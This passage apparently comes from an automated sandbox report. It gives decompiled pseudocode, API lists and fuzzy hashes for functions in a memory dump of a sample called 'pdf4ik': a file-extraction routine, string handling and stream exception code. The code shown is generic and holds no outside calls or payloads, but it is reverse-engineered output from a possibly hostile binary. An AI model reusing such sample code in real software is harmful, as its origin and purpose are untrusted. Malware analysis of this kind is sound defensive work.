                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap_strcpy_s$EnumFreeOpenProcessValue
                                        • String ID: Password$yxxx
                                        • API String ID: 1955650795-2072026738
                                        • Opcode ID: 5a4f529137064749b02a9b3a09a556c0f590f9b6b1b2306c40aac9a236a890bb
                                        • Instruction ID: 8591c462b0c894c7566ade346bae140c75b19c2754d39b1537804fdfc8d794a1
                                        • Opcode Fuzzy Hash: 5a4f529137064749b02a9b3a09a556c0f590f9b6b1b2306c40aac9a236a890bb
                                        • Instruction Fuzzy Hash: B4E162B18002689FEB25CF28CD84FDAB7B9BF44304F1086DDD549A7641DB31AA86DF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D8E4F0 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 224timeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 97%
                                        			E29D8E4F0(void* __edx, void* _a4, void* _a8) {
				signed int _v8;
				char _v275;
				char _v276;
				char _v540;
				struct _FILETIME _v560;
				struct _FILETIME _v568;
				struct _FILETIME _v576;
				unsigned int _v580;
				char _v844;
				char _v845;
				void* _v852;
				long _v856;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t66;
				intOrPtr* _t69;
				void* _t70;
				signed char _t74;
				void* _t75;
				void* _t77;
				void* _t90;
				void* _t91;
				intOrPtr _t95;
				signed int _t98;
				void* _t100;
				void** _t103;
				void* _t105;
				void* _t108;
				void* _t110;
				void* _t123;
				void* _t127;
				long _t128;
				void* _t131;
				signed int _t132;
				void* _t133;
				signed int _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void* _t138;

				_t119 = __edx;
				_t66 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t66 ^ _t134;
				_v852 = _a8;
				_t69 =  *0x29dd82dc; // 0x0
				if(_t69 == 0) {
					L6:
					_t70 = 0x10000;
					L46:
					 *0x29dd86b0 = _t70;
					return E29DADF46(_t70, _t103, _v8 ^ _t134, _t119, _t127, _t131);
				}
				if( *_t69 == 1) {
					_t103 =  *(_t69 + 4);
					_t132 = _t131 | 0xffffffff;
					_v856 = _t103;
					__eflags = _t103[1] - _t132;
					if(_t103[1] != _t132) {
						E29D8D630(_t105,  *_t103);
					}
					_t127 = _a4;
					_t103[1] = _t132;
					_t131 =  *_t103;
					__eflags = _t127 -  *((intOrPtr*)(_t131 + 4));
					if(_t127 <  *((intOrPtr*)(_t131 + 4))) {
						__eflags = _t127 -  *((intOrPtr*)(_t131 + 0x10));
						if(_t127 <  *((intOrPtr*)(_t131 + 0x10))) {
							E29D8CE10(_t131);
						}
						_t108 =  *_t103;
						__eflags =  *((intOrPtr*)(_t108 + 0x10)) - _t127;
						if( *((intOrPtr*)(_t108 + 0x10)) >= _t127) {
							L15:
							_t119 =  &_v844;
							E29D8D7B0(_t103,  &_v844, _t127);
							_t74 = _v580 >> 4;
							__eflags = _t74 & 0x00000001;
							if((_t74 & 0x00000001) == 0) {
								_t127 = _v852;
								_t75 =  *_t127;
								_v540 = 0;
								_t133 = _t127;
								_t110 = _t127;
								__eflags = _t75;
								if(_t75 == 0) {
									L23:
									E29DAE8E8( &_v276, _t127, 0x104);
									_t136 = _t135 + 0xc;
									__eflags = _t133 - _t127;
									if(_t133 != _t127) {
										 *((char*)(_t134 + _t133 - _t127 - 0x110)) = 0;
										_t77 = _v276;
										__eflags = _t77 - 0x2f;
										if(_t77 == 0x2f) {
											L32:
											wsprintfA( &_v540, "%s%s",  &_v276, _t133);
											_t137 = _t136 + 0x10;
											L26:
											_t119 = _v580;
											_t131 = CreateFileA( &_v540, 0x40000000, 0, 0, 2, _v580, 0);
											__eflags = _t131 - 0xffffffff;
											if(_t131 != 0xffffffff) {
												E29D8D260( *_t103, _t103[0x4e], _t103[0x4e]);
												_t103 = _v856;
												_t138 = _t137 + 4;
												__eflags = _t103[0x4f];
												if(__eflags == 0) {
													_t91 = E29DAD4FB(_t103, _t119, _t127, _t131, __eflags, 0x4000);
													_t138 = _t138 + 4;
													_t103[0x4f] = _t91;
												}
												_v852 = 0;
												while(1) {
													_t119 =  &_v845;
													_t114 = 0x4000;
													_t128 = E29D8D3D0( *_t103, 0x4000, _t103[0x4f],  &_v845);
													_t138 = _t138 + 8;
													__eflags = _t128 - 0xffffff96;
													if(_t128 == 0xffffff96) {
														break;
													}
													__eflags = _t128;
													if(__eflags < 0) {
														L42:
														_v852 = 0x5000000;
														L43:
														E29D8D630(_t114,  *_t103);
														_t127 = _v852;
														__eflags = _t127;
														if(_t127 == 0) {
															_t119 =  &_v568;
															SetFileTime(_t131,  &_v568,  &_v576,  &_v560);
														}
														CloseHandle(_t131);
														_t70 = _t127;
														goto L46;
													}
													if(__eflags <= 0) {
														L40:
														__eflags = _v845;
														if(_v845 != 0) {
															goto L43;
														}
														__eflags = _t128;
														if(_t128 != 0) {
															continue;
														}
														goto L42;
													}
													_t119 = _t103[0x4f];
													_t114 =  &_v856;
													_t90 = WriteFile(_t131, _t103[0x4f], _t128,  &_v856, 0);
													__eflags = _t90;
													if(_t90 == 0) {
														_v852 = 0x400;
														goto L43;
													}
													goto L40;
												}
												_v852 = 0x1000;
												goto L43;
											}
											_t70 = 0x200;
											goto L46;
										}
										__eflags = _t77 - 0x5c;
										if(_t77 == 0x5c) {
											goto L32;
										}
										__eflags = _t77;
										if(_t77 == 0) {
											L25:
											wsprintfA( &_v540, "%s%s%s",  &(_t103[0x50]),  &_v276, _t133);
											_t137 = _t136 + 0x14;
											goto L26;
										}
										__eflags = _v275 - 0x3a;
										if(_v275 != 0x3a) {
											goto L25;
										}
										goto L32;
									}
									_v276 = 0;
									goto L25;
								}
								do {
									__eflags = _t75 - 0x2f;
									if(_t75 == 0x2f) {
										L21:
										_t133 = _t110 + 1;
										goto L22;
									}
									__eflags = _t75 - 0x5c;
									if(_t75 != 0x5c) {
										goto L22;
									}
									goto L21;
									L22:
									_t75 =  *(_t110 + 1);
									_t110 = _t110 + 1;
									__eflags = _t75;
								} while (_t75 != 0);
								goto L23;
							}
							_t70 = 0;
							goto L46;
						} else {
							do {
								_t131 =  *_t103;
								__eflags = _t131;
								if(_t131 != 0) {
									__eflags =  *(_t131 + 0x18);
									if( *(_t131 + 0x18) != 0) {
										_t95 =  *((intOrPtr*)(_t131 + 0x10)) + 1;
										__eflags = _t95 -  *((intOrPtr*)(_t131 + 4));
										if(_t95 !=  *((intOrPtr*)(_t131 + 4))) {
											 *((intOrPtr*)(_t131 + 0x10)) = _t95;
											 *((intOrPtr*)(_t131 + 0x14)) =  *((intOrPtr*)(_t131 + 0x14)) +  *((intOrPtr*)(_t131 + 0x50)) +  *((intOrPtr*)(_t131 + 0x4c)) +  *((intOrPtr*)(_t131 + 0x48)) + 0x2e;
											_t98 = E29D8CA10(_t131, _t131 + 0x28, _t131 + 0x78, 0, 0);
											_t135 = _t135 + 0x10;
											asm("sbb eax, eax");
											_t100 =  ~_t98 + 1;
											__eflags = _t100;
											 *(_t131 + 0x18) = _t100;
										}
									}
								}
								_t123 =  *_t103;
								__eflags =  *((intOrPtr*)(_t123 + 0x10)) - _t127;
							} while ( *((intOrPtr*)(_t123 + 0x10)) < _t127);
							goto L15;
						}
					} else {
						goto L6;
					}
				} else {
					_t70 = 0x80000;
					goto L46;
				}
			}












































                                        0x29d8e4f0
                                        0x29d8e4f9
                                        0x29d8e500
                                        0x29d8e507
                                        0x29d8e50d
                                        0x29d8e516
                                        0x29d8e54c
                                        0x29d8e54c
                                        0x29d8e797
                                        0x29d8e79e
                                        0x29d8e7ac
                                        0x29d8e7ac
                                        0x29d8e51b
                                        0x29d8e527
                                        0x29d8e52a
                                        0x29d8e52d
                                        0x29d8e533
                                        0x29d8e536
                                        0x29d8e53a
                                        0x29d8e53a
                                        0x29d8e53f
                                        0x29d8e542
                                        0x29d8e545
                                        0x29d8e547
                                        0x29d8e54a
                                        0x29d8e556
                                        0x29d8e559
                                        0x29d8e55b
                                        0x29d8e55b
                                        0x29d8e560
                                        0x29d8e562
                                        0x29d8e565
                                        0x29d8e5b4
                                        0x29d8e5b5
                                        0x29d8e5bd
                                        0x29d8e5c8
                                        0x29d8e5cb
                                        0x29d8e5cd
                                        0x29d8e5d6
                                        0x29d8e5dc
                                        0x29d8e5de
                                        0x29d8e5e5
                                        0x29d8e5e7
                                        0x29d8e5e9
                                        0x29d8e5eb
                                        0x29d8e603
                                        0x29d8e610
                                        0x29d8e615
                                        0x29d8e618
                                        0x29d8e61a
                                        0x29d8e67d
                                        0x29d8e685
                                        0x29d8e68b
                                        0x29d8e68d
                                        0x29d8e6a0
                                        0x29d8e6b4
                                        0x29d8e6ba
                                        0x29d8e647
                                        0x29d8e647
                                        0x29d8e668
                                        0x29d8e66a
                                        0x29d8e66d
                                        0x29d8e6c8
                                        0x29d8e6cd
                                        0x29d8e6d3
                                        0x29d8e6d6
                                        0x29d8e6dd
                                        0x29d8e6e4
                                        0x29d8e6e9
                                        0x29d8e6ec
                                        0x29d8e6ec
                                        0x29d8e6f2
                                        0x29d8e700
                                        0x29d8e706
                                        0x29d8e710
                                        0x29d8e71a
                                        0x29d8e71c
                                        0x29d8e71f
                                        0x29d8e722
                                        0x00000000
                                        0x00000000
                                        0x29d8e728
                                        0x29d8e72a
                                        0x29d8e757
                                        0x29d8e757
                                        0x29d8e761
                                        0x29d8e763
                                        0x29d8e768
                                        0x29d8e76e
                                        0x29d8e770
                                        0x29d8e780
                                        0x29d8e788
                                        0x29d8e788
                                        0x29d8e78f
                                        0x29d8e795
                                        0x00000000
                                        0x29d8e795
                                        0x29d8e72c
                                        0x29d8e74a
                                        0x29d8e74a
                                        0x29d8e751
                                        0x00000000
                                        0x00000000
                                        0x29d8e753
                                        0x29d8e755
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8e755
                                        0x29d8e72e
                                        0x29d8e736
                                        0x29d8e740
                                        0x29d8e746
                                        0x29d8e748
                                        0x29d8e7b9
                                        0x00000000
                                        0x29d8e7b9
                                        0x00000000
                                        0x29d8e748
                                        0x29d8e7ad
                                        0x00000000
                                        0x29d8e7ad
                                        0x29d8e66f
                                        0x00000000
                                        0x29d8e66f
                                        0x29d8e68f
                                        0x29d8e691
                                        0x00000000
                                        0x00000000
                                        0x29d8e693
                                        0x29d8e695
                                        0x29d8e623
                                        0x29d8e63e
                                        0x29d8e644
                                        0x00000000
                                        0x29d8e644
                                        0x29d8e697
                                        0x29d8e69e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8e69e
                                        0x29d8e61c
                                        0x00000000
                                        0x29d8e61c
                                        0x29d8e5f0
                                        0x29d8e5f0
                                        0x29d8e5f2
                                        0x29d8e5f8
                                        0x29d8e5f8
                                        0x00000000
                                        0x29d8e5f8
                                        0x29d8e5f4
                                        0x29d8e5f6
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8e5fb
                                        0x29d8e5fb
                                        0x29d8e5fe
                                        0x29d8e5ff
                                        0x29d8e5ff
                                        0x00000000
                                        0x29d8e5f0
                                        0x29d8e5cf
                                        0x00000000
                                        0x29d8e567
                                        0x29d8e567
                                        0x29d8e567
                                        0x29d8e569
                                        0x29d8e56b
                                        0x29d8e56d
                                        0x29d8e571
                                        0x29d8e576
                                        0x29d8e577
                                        0x29d8e57a
                                        0x29d8e587
                                        0x29d8e58e
                                        0x29d8e59d
                                        0x29d8e5a2
                                        0x29d8e5a7
                                        0x29d8e5a9
                                        0x29d8e5a9
                                        0x29d8e5aa
                                        0x29d8e5aa
                                        0x29d8e57a
                                        0x29d8e571
                                        0x29d8e5ad
                                        0x29d8e5af
                                        0x29d8e5af
                                        0x00000000
                                        0x29d8e567
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8e51d
                                        0x29d8e51d
                                        0x00000000
                                        0x29d8e51d

                                        APIs
                                        • SetFileTime.KERNEL32(00000000,?,?,?), ref: 29D8E788
                                        • CloseHandle.KERNEL32(00000000), ref: 29D8E78F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseFileHandleTime
                                        • String ID: %s%s$%s%s%s$:
                                        • API String ID: 2100898393-3034790606
                                        • Opcode ID: c2bd6088dbb00b13d4f8e570340300c7c6a9debb9ce7100432009996600fbe02
                                        • Instruction ID: 0f0cac4f087c1800f9aa338f3137961c6f56cc41ad8eadf81b507bb1da2119dd
                                        • Opcode Fuzzy Hash: c2bd6088dbb00b13d4f8e570340300c7c6a9debb9ce7100432009996600fbe02
                                        • Instruction Fuzzy Hash: 2D8124719002149BCB25EF24CC84BDA73B9BF55704F0446DDE649ABA82D770AA87DFB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D89B10 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 188COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 84%
                                        			E29D89B10(void* __eax, intOrPtr* __ebx, void* __ecx, intOrPtr* __esi, signed int _a4) {
				intOrPtr _v0;
				char _v8;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t44;
				signed int _t45;
				signed int _t48;
				signed int _t53;
				signed int _t57;
				signed int _t58;
				void* _t65;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr* _t69;
				intOrPtr* _t73;
				intOrPtr _t78;
				char* _t83;
				void* _t88;
				signed int _t100;
				intOrPtr _t101;
				intOrPtr _t102;
				signed int _t103;
				intOrPtr _t105;
				intOrPtr _t108;
				intOrPtr* _t109;
				intOrPtr* _t110;
				intOrPtr _t112;
				intOrPtr* _t113;
				signed int _t117;
				char _t123;
				signed int _t125;
				void* _t128;
				intOrPtr _t129;
				signed int _t139;

				_t138 = __esi;
				_t87 = __ebx;
				_push(__ecx);
				_t100 = _a4;
				_t128 = __eax;
				_t40 =  *((intOrPtr*)(__ebx + 0x10));
				if(_t40 < _t100) {
					_t41 = E29DAD48D("invalid string position");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(__ebx);
					_t88 = _t41;
					_push(__esi);
					_t139 = _t100;
					if(_t88 == 0) {
						L53:
						_t42 =  *((intOrPtr*)(_t139 + 0x10));
						_t101 = _v0;
						if((_t117 | 0xffffffff) - _t42 <= _t101) {
							_t42 = E29DAD440("string too long");
						}
						if(_t101 == 0) {
							L77:
							return _t139;
						} else {
							_push(_t128);
							_t129 = _t42 + _t101;
							if(_t129 > 0xfffffffe) {
								_t42 = E29DAD440("string too long");
							}
							_t102 =  *((intOrPtr*)(_t139 + 0x14));
							if(_t102 >= _t129) {
								if(_t129 != 0) {
									goto L60;
								} else {
									 *((intOrPtr*)(_t139 + 0x10)) = _t129;
									if(_t102 < 0x10) {
										_t53 = _t139;
										 *_t53 = 0;
										return _t53;
									} else {
										 *( *_t139) = 0;
										return _t139;
									}
								}
							} else {
								E29D89750(_t139, _t129, _t42);
								if(_t129 == 0) {
									L76:
									goto L77;
								} else {
									L60:
									_t44 =  *((intOrPtr*)(_t139 + 0x14));
									if(_t44 < 0x10) {
										_t103 = _t139;
									} else {
										_t103 =  *_t139;
									}
									if(_t44 < 0x10) {
										_t45 = _t139;
									} else {
										_t45 =  *_t139;
									}
									E29DAE1F0(_t45 + _v0, _t103,  *((intOrPtr*)(_t139 + 0x10)));
									if( *((intOrPtr*)(_t139 + 0x14)) < 0x10) {
										_t48 = _t139;
									} else {
										_t48 =  *_t139;
									}
									E29DB0010(_t48, _t88, _v0);
									 *((intOrPtr*)(_t139 + 0x10)) = _t129;
									if( *((intOrPtr*)(_t139 + 0x14)) < 0x10) {
										 *((char*)(_t139 + _t129)) = 0;
										goto L76;
									} else {
										 *((char*)( *_t139 + _t129)) = 0;
										return _t139;
									}
								}
							}
						}
					} else {
						_t105 =  *((intOrPtr*)(_t139 + 0x14));
						if(_t105 < 0x10) {
							_t57 = _t139;
						} else {
							_t57 =  *_t139;
						}
						if(_t88 < _t57) {
							goto L53;
						} else {
							if(_t105 < 0x10) {
								_t58 = _t139;
							} else {
								_t58 =  *_t139;
							}
							_t117 =  *((intOrPtr*)(_t139 + 0x10)) + _t58;
							if(_t117 <= _t88) {
								goto L53;
							} else {
								if(_t105 < 0x10) {
									return E29D89B10(_v0, _t139, _t105, _t139, _t88 - _t139);
								} else {
									return E29D89B10(_v0, _t139, _t105, _t139, _t88 -  *_t139);
								}
							}
						}
					}
				} else {
					_t65 = _t40 - _t100;
					if(_t65 < __eax) {
						_t128 = _t65;
					}
					_t66 =  *((intOrPtr*)(_t138 + 0x10));
					if((_t100 | 0xffffffff) - _t66 <= _t128) {
						_t66 = E29DAD440("string too long");
					}
					if(_t128 == 0) {
						L39:
						return _t138;
					} else {
						_t123 = _t66 + _t128;
						_v8 = _t123;
						if(_t123 > 0xfffffffe) {
							_t66 = E29DAD440("string too long");
						}
						_t108 =  *((intOrPtr*)(_t138 + 0x14));
						if(_t108 >= _t123) {
							if(_t123 != 0) {
								goto L10;
							} else {
								 *((intOrPtr*)(_t138 + 0x10)) = _t123;
								if(_t108 < 0x10) {
									_t83 = _t138;
									 *_t83 = 0;
									return _t83;
								} else {
									 *((char*)( *_t138)) = _t123;
									return _t138;
								}
							}
						} else {
							E29D89750(_t138, _t123, _t66);
							if(_v8 == 0) {
								goto L39;
							} else {
								L10:
								_t68 =  *((intOrPtr*)(_t138 + 0x14));
								if(_t68 < 0x10) {
									_t109 = _t138;
								} else {
									_t109 =  *_t138;
								}
								if(_t68 < 0x10) {
									_t69 = _t138;
								} else {
									_t69 =  *_t138;
								}
								E29DAE1F0(_t69 + _t128, _t109,  *((intOrPtr*)(_t138 + 0x10)));
								if(_t138 != _t87) {
									if( *((intOrPtr*)(_t87 + 0x14)) < 0x10) {
										_t110 = _t87;
									} else {
										_t110 =  *_t87;
									}
									if( *((intOrPtr*)(_t138 + 0x14)) < 0x10) {
										_t73 = _t138;
									} else {
										_t73 =  *_t138;
									}
									E29DB0010(_t73, _t110 + _a4, _t128);
								} else {
									_t125 = _a4;
									if(_t125 != 0) {
										_t125 = _t125 + _t128;
									}
									_t78 =  *((intOrPtr*)(_t138 + 0x14));
									if(_t78 < 0x10) {
										_t113 = _t138;
									} else {
										_t113 =  *_t138;
									}
									if(_t78 < 0x10) {
										E29DAE1F0(_t138, _t113 + _t125, _t128);
									} else {
										E29DAE1F0( *_t138, _t113 + _t125, _t128);
									}
								}
								_t112 = _v8;
								 *((intOrPtr*)(_t138 + 0x10)) = _t112;
								if( *((intOrPtr*)(_t138 + 0x14)) < 0x10) {
									 *((char*)(_t138 + _t112)) = 0;
									goto L39;
								} else {
									 *((char*)( *_t138 + _t112)) = 0;
									return _t138;
								}
							}
						}
					}
				}
			}






































                                        0x29d89b10
                                        0x29d89b10
                                        0x29d89b13
                                        0x29d89b14
                                        0x29d89b18
                                        0x29d89b1a
                                        0x29d89b1f
                                        0x29d89c5d
                                        0x29d89c62
                                        0x29d89c63
                                        0x29d89c64
                                        0x29d89c65
                                        0x29d89c66
                                        0x29d89c67
                                        0x29d89c68
                                        0x29d89c69
                                        0x29d89c6a
                                        0x29d89c6b
                                        0x29d89c6c
                                        0x29d89c6d
                                        0x29d89c6e
                                        0x29d89c6f
                                        0x29d89c73
                                        0x29d89c74
                                        0x29d89c76
                                        0x29d89c77
                                        0x29d89c7b
                                        0x29d89cd2
                                        0x29d89cd2
                                        0x29d89cd5
                                        0x29d89cdf
                                        0x29d89ce6
                                        0x29d89ce6
                                        0x29d89ced
                                        0x29d89da7
                                        0x29d89dac
                                        0x29d89cf3
                                        0x29d89cf3
                                        0x29d89cf4
                                        0x29d89cfa
                                        0x29d89d01
                                        0x29d89d01
                                        0x29d89d06
                                        0x29d89d0b
                                        0x29d89d2c
                                        0x00000000
                                        0x29d89d2e
                                        0x29d89d2e
                                        0x29d89d34
                                        0x29d89d45
                                        0x29d89d48
                                        0x29d89d4d
                                        0x29d89d36
                                        0x29d89d39
                                        0x29d89d41
                                        0x29d89d41
                                        0x29d89d34
                                        0x29d89d0d
                                        0x29d89d11
                                        0x29d89d18
                                        0x29d89da6
                                        0x00000000
                                        0x29d89d1e
                                        0x29d89d1e
                                        0x29d89d1e
                                        0x29d89d24
                                        0x29d89d50
                                        0x29d89d26
                                        0x29d89d26
                                        0x29d89d26
                                        0x29d89d55
                                        0x29d89d5b
                                        0x29d89d57
                                        0x29d89d57
                                        0x29d89d57
                                        0x29d89d66
                                        0x29d89d72
                                        0x29d89d78
                                        0x29d89d74
                                        0x29d89d74
                                        0x29d89d74
                                        0x29d89d80
                                        0x29d89d8c
                                        0x29d89d8f
                                        0x29d89da2
                                        0x00000000
                                        0x29d89d91
                                        0x29d89d93
                                        0x29d89d9d
                                        0x29d89d9d
                                        0x29d89d8f
                                        0x29d89d18
                                        0x29d89d0b
                                        0x29d89c7d
                                        0x29d89c7d
                                        0x29d89c83
                                        0x29d89c89
                                        0x29d89c85
                                        0x29d89c85
                                        0x29d89c85
                                        0x29d89c8d
                                        0x00000000
                                        0x29d89c8f
                                        0x29d89c92
                                        0x29d89c98
                                        0x29d89c94
                                        0x29d89c94
                                        0x29d89c94
                                        0x29d89c9d
                                        0x29d89ca1
                                        0x00000000
                                        0x29d89ca3
                                        0x29d89ca6
                                        0x29d89ccf
                                        0x29d89ca8
                                        0x29d89cba
                                        0x29d89cba
                                        0x29d89ca6
                                        0x29d89ca1
                                        0x29d89c8d
                                        0x29d89b25
                                        0x29d89b25
                                        0x29d89b29
                                        0x29d89b2b
                                        0x29d89b2b
                                        0x29d89b2d
                                        0x29d89b37
                                        0x29d89b3e
                                        0x29d89b3e
                                        0x29d89b45
                                        0x29d89c4f
                                        0x29d89c55
                                        0x29d89b4b
                                        0x29d89b4b
                                        0x29d89b4e
                                        0x29d89b54
                                        0x29d89b5b
                                        0x29d89b5b
                                        0x29d89b60
                                        0x29d89b65
                                        0x29d89b89
                                        0x00000000
                                        0x29d89b8b
                                        0x29d89b8b
                                        0x29d89b91
                                        0x29d89ba0
                                        0x29d89ba2
                                        0x29d89ba9
                                        0x29d89b93
                                        0x29d89b95
                                        0x29d89b9d
                                        0x29d89b9d
                                        0x29d89b91
                                        0x29d89b67
                                        0x29d89b6b
                                        0x29d89b75
                                        0x00000000
                                        0x29d89b7b
                                        0x29d89b7b
                                        0x29d89b7b
                                        0x29d89b81
                                        0x29d89bac
                                        0x29d89b83
                                        0x29d89b83
                                        0x29d89b83
                                        0x29d89bb1
                                        0x29d89bb7
                                        0x29d89bb3
                                        0x29d89bb3
                                        0x29d89bb3
                                        0x29d89bc1
                                        0x29d89bcb
                                        0x29d89c0d
                                        0x29d89c13
                                        0x29d89c0f
                                        0x29d89c0f
                                        0x29d89c0f
                                        0x29d89c18
                                        0x29d89c1e
                                        0x29d89c1a
                                        0x29d89c1a
                                        0x29d89c1a
                                        0x29d89c26
                                        0x29d89bcd
                                        0x29d89bcd
                                        0x29d89bd2
                                        0x29d89bd4
                                        0x29d89bd4
                                        0x29d89bd6
                                        0x29d89bdc
                                        0x29d89be2
                                        0x29d89bde
                                        0x29d89bde
                                        0x29d89bde
                                        0x29d89be7
                                        0x29d89bfe
                                        0x29d89be9
                                        0x29d89bf0
                                        0x29d89bf0
                                        0x29d89be7
                                        0x29d89c2b
                                        0x29d89c35
                                        0x29d89c38
                                        0x29d89c4b
                                        0x00000000
                                        0x29d89c3a
                                        0x29d89c3c
                                        0x29d89c46
                                        0x29d89c46
                                        0x29d89c38
                                        0x29d89b75
                                        0x29d89b65
                                        0x29d89b45

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_$_memmove
                                        • String ID: Software\Micr$invalid string position$string too long
                                        • API String ID: 2168136238-2646184632
                                        • Opcode ID: 245d74ae2eae1fe01b4cf3ef4fb8fed6932cf86b1906f6ad391dac6fd3c52df8
                                        • Instruction ID: f876d4bdacfca396a2d163d3f1489a767b7b682dfe5c8be8d398cd98fa561ac5
                                        • Opcode Fuzzy Hash: 245d74ae2eae1fe01b4cf3ef4fb8fed6932cf86b1906f6ad391dac6fd3c52df8
                                        • Instruction Fuzzy Hash: CB51A4717101009BD728CE6DD8D8D2AB3EEFF916107144A2EE5C287E46DB71AC53A7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D98D80 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 66COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 76%
                                        			E29D98D80(void* __ecx, void* __edi, char* _a4) {
				intOrPtr* _v8;
				char _v12;
				char _v24;
				char _v40;
				signed char _t35;
				intOrPtr* _t36;
				void* _t38;
				intOrPtr _t40;
				intOrPtr _t44;
				intOrPtr* _t48;
				void* _t52;
				char* _t54;
				intOrPtr* _t64;
				intOrPtr _t68;

				_t52 = __ecx;
				if(_a4 != 0) {
					E29DAFF06(0, 0);
				}
				_t35 =  *(_t52 + 0x10) &  *(_t52 + 0xc);
				if((_t35 & 0x00000004) != 0) {
					_t48 = E29DAD5A5();
					_a4 = "ios_base::badbit set";
					E29DAE0FC( &_v24,  &_a4);
					_v12 = 1;
					_v8 = _t48;
					_v24 = 0x29dd06d8;
					_t35 = E29DAFF06( &_v24, 0x29dd20bc);
				}
				if((_t35 & 0x00000002) != 0) {
					_t44 = E29DAD5A5();
					_a4 = "ios_base::failbit set";
					E29DAE0FC( &_v24,  &_a4);
					_v12 = 1;
					_v8 = _t44;
					_v24 = 0x29dd06d8;
					E29DAFF06( &_v24, 0x29dd20bc);
				}
				_t36 = E29DAD5A5();
				_t54 =  &_v24;
				_t64 = _t36;
				_a4 = "ios_base::eofbit set";
				E29DAE0FC(_t54,  &_a4);
				_v12 = 1;
				_v8 = _t64;
				_v24 = 0x29dd06d8;
				_t38 = E29DAFF06( &_v24, 0x29dd20bc);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_push(_t54);
				_t29 = _t38 + 0x30; // 0x29dd146c
				_push(1);
				_t68 =  *((intOrPtr*)( *_t29));
				 *_t64 = _t68;
				E29DADA5D( &_v40, 0);
				_t40 =  *((intOrPtr*)(_t68 + 4));
				if(_t40 < 0xffffffff) {
					 *((intOrPtr*)(_t68 + 4)) = _t40 + 1;
				}
				E29DADA85( &_v12);
				return _t64;
			}

















                                        0x29d98d80
                                        0x29d98d8c
                                        0x29d98d92
                                        0x29d98d92
                                        0x29d98d9a
                                        0x29d98da4
                                        0x29d98da6
                                        0x29d98db4
                                        0x29d98dbb
                                        0x29d98dc9
                                        0x29d98dcc
                                        0x29d98dcf
                                        0x29d98dd6
                                        0x29d98dd6
                                        0x29d98ddd
                                        0x29d98ddf
                                        0x29d98ded
                                        0x29d98df4
                                        0x29d98e02
                                        0x29d98e05
                                        0x29d98e08
                                        0x29d98e0f
                                        0x29d98e0f
                                        0x29d98e14
                                        0x29d98e1d
                                        0x29d98e20
                                        0x29d98e22
                                        0x29d98e29
                                        0x29d98e37
                                        0x29d98e3a
                                        0x29d98e3d
                                        0x29d98e44
                                        0x29d98e49
                                        0x29d98e4a
                                        0x29d98e4b
                                        0x29d98e4c
                                        0x29d98e4d
                                        0x29d98e4e
                                        0x29d98e4f
                                        0x29d98e53
                                        0x29d98e54
                                        0x29d98e57
                                        0x29d98e58
                                        0x29d98e5f
                                        0x29d98e61
                                        0x29d98e66
                                        0x29d98e6c
                                        0x29d98e6f
                                        0x29d98e6f
                                        0x29d98e75
                                        0x29d98e80

                                        APIs
                                        • __CxxThrowException@8.LIBCMT ref: 29D98D92
                                          • Part of subcall function 29DAFF06: RaiseException.KERNEL32(29D89803,00000001,D9555F04,29DC52AC,29D89803,00000001,29DD2028,29D851F1,D9555F04), ref: 29DAFF48
                                        • std::exception::exception.LIBCMT ref: 29D98DBB
                                        • __CxxThrowException@8.LIBCMT ref: 29D98DD6
                                        • std::exception::exception.LIBCMT ref: 29D98DF4
                                        • __CxxThrowException@8.LIBCMT ref: 29D98E0F
                                        • std::exception::exception.LIBCMT ref: 29D98E29
                                        • __CxxThrowException@8.LIBCMT ref: 29D98E44
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception@8Throw$std::exception::exception$ExceptionRaise
                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                        • API String ID: 4237746311-1866435925
                                        • Opcode ID: 5103affbf9ebf80334c40a9a17f168540f25626b351b2b9c3477a8428263008b
                                        • Instruction ID: 85f135387463bd6343c9548ce5d3085eefd7c76369efaa1ac292a578a206a627
